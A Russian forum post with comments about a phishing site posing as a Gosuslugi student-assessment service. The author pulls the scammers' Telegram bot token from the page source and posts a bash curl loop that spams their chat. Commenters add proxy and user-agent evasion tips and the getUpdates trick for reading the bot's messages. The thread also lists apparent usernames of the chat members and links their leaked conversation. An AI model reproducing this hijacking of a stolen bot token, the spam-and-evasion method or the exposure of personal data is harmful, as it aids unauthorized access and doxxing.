2665

Лопухи1

Зашёл полистать новости, а там как всегда отбитые мошенники:

В МВД предупредили, что мошенники выманивают коды доступа от аккаунтов на "Госуслугах", предлагая зарегистрироваться в некой единой госсистеме оценивания студентов.

Ссылки выглядят легитимно: гесос. рус или gesos. ru, однако ведут на ресурс с намного менее презентабельным адресом

Зашёл посмотреть на этот сайт, в принципе ничего особенного: введите ФИО, паспорт, телефон, снилс, и мы всё пришлём. Ну ок, давайте посмотрим исходный код страницы. А там - прямым текстом указан ключ для бота телеги, который и скидывает злодеям в чатик всё что вы ввели.

Грех не воспользоваться такой ситуацией. Открываем консоль, пишем короткую команду:

while true; do
curl -XPOST https://api.telegram.org/bot7704374924:xxx/sendMessage \
-H 'Content-Type: application/json'\
-d "{\"chat_id\": \"-1002347034585\", \"text\": \"$(pwgen -nyc 1024 1)\"}";
sleep 2;
done

И идём курить. Для тех кто не понимает в чём суть - каждые 2 секунды бот отправляет своему хозяину 1024 символа отборного мусора.

После перекура с сожалением увидел в ответах от бота: "Forbidden: bot was kicked from the supergroup chat", т.е. бота выгнали из чата.

Штош, подождём пока обновят ключи API.

P.S. Подсказали как можно посмотреть участников чата. #comment_340692584

Вы смотрите срез комментариев. Показать все
45
Автор поста оценил этот комментарий

Ещё юзерагента задай, чтоб сложнее отсеивать было. Но и да, спуфьте просто похожими на правду данными, лучше на питоне скрипт.

раскрыть ветку (22)
12
Автор поста оценил этот комментарий

А ещё, чтоб по ip тоже не светилось и нельзя было фильтровать - через список http/socks открытых прокси.

Ну и на питоне это можно по запрос через прокси в каждом отдельном потоке пускать - чтоб быстрее было и больше уходило.

раскрыть ветку (21)
20
Автор поста оценил этот комментарий

Телега блокировать токен начинала, если слишком часто слать. Поэтому на 2 секунды поставил

раскрыть ветку (20)
21
Автор поста оценил этот комментарий

Кстати, зная ключ апи, можно глянуть, мож ещё в каких группах бот состоит

раскрыть ветку (19)
19
Автор поста оценил этот комментарий

Век живи - век учись.

Как узнать? У меня оба ключа в истории остались

раскрыть ветку (18)
26
Автор поста оценил этот комментарий

https://api.telegram.org/bot{token}/getUpdates можно попробовать, правда не факт

раскрыть ветку (17)
123
Автор поста оценил этот комментарий

Найс. Участники чата:


Alex05091987

iikkmm9

myn1488

odmitriy1312

Namoment_bot

sss123ir

Drobach99

rulik1312

Fucking_Fucked_p

makovey1976

salvs17

rrooll11

yyaann1133

Drobach99

kvadroberDr

morkov_4a

раскрыть ветку (16)
88
Автор поста оценил этот комментарий

И переписка, чтобы 2 раза не вставать:


https://justpaste.it/djn5x

раскрыть ветку (14)
28
Автор поста оценил этот комментарий
А как чужую переписку в телеге можно взломать? 😱
раскрыть ветку (2)
28
Автор поста оценил этот комментарий

Я так понимаю, что, зная ключ от бота, можно им полностью управлять: получать его сообщения, писать от его имени, смотреть его группы и состав участников групп и т.д.

раскрыть ветку (1)
7
Автор поста оценил этот комментарий
Ага, а эти не очень умные люди даже никуда его не спрятали, а просто в коде страницы оставили
47
Автор поста оценил этот комментарий

Кирилл Викторович (makovey1976): я говорю им шо щас смс будет приходить что бы не спешили

RuLick (rulik1312): та мы понимаем. Тутже обсуждение


Та шо ж такоэ, опять калибровать надо.

2
Автор поста оценил этот комментарий

А личные данные Тимофея не стоило убрать?

0
Автор поста оценил этот комментарий
И даже не на украинском? Не, ну тогда это фейк
раскрыть ветку (8)
22
Автор поста оценил этот комментарий

Так они же не идиоты, чтобы на мове друг с другом общаться. На мове только официально, а меж собой все на русском, он явно поудобнее будет)

Но вообще в сообщениях просматриваются характерные «та» и «шо»)

раскрыть ветку (7)
18
Автор поста оценил этот комментарий
Та ти шо
раскрыть ветку (2)
6
Автор поста оценил этот комментарий
Таки на шо ви намекаете?
раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Ну вообще, не гарантированный показатель, такие вещи у нас часто используются в неформальной переписке и общении.

раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Всех админов Пикабу спалил..

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку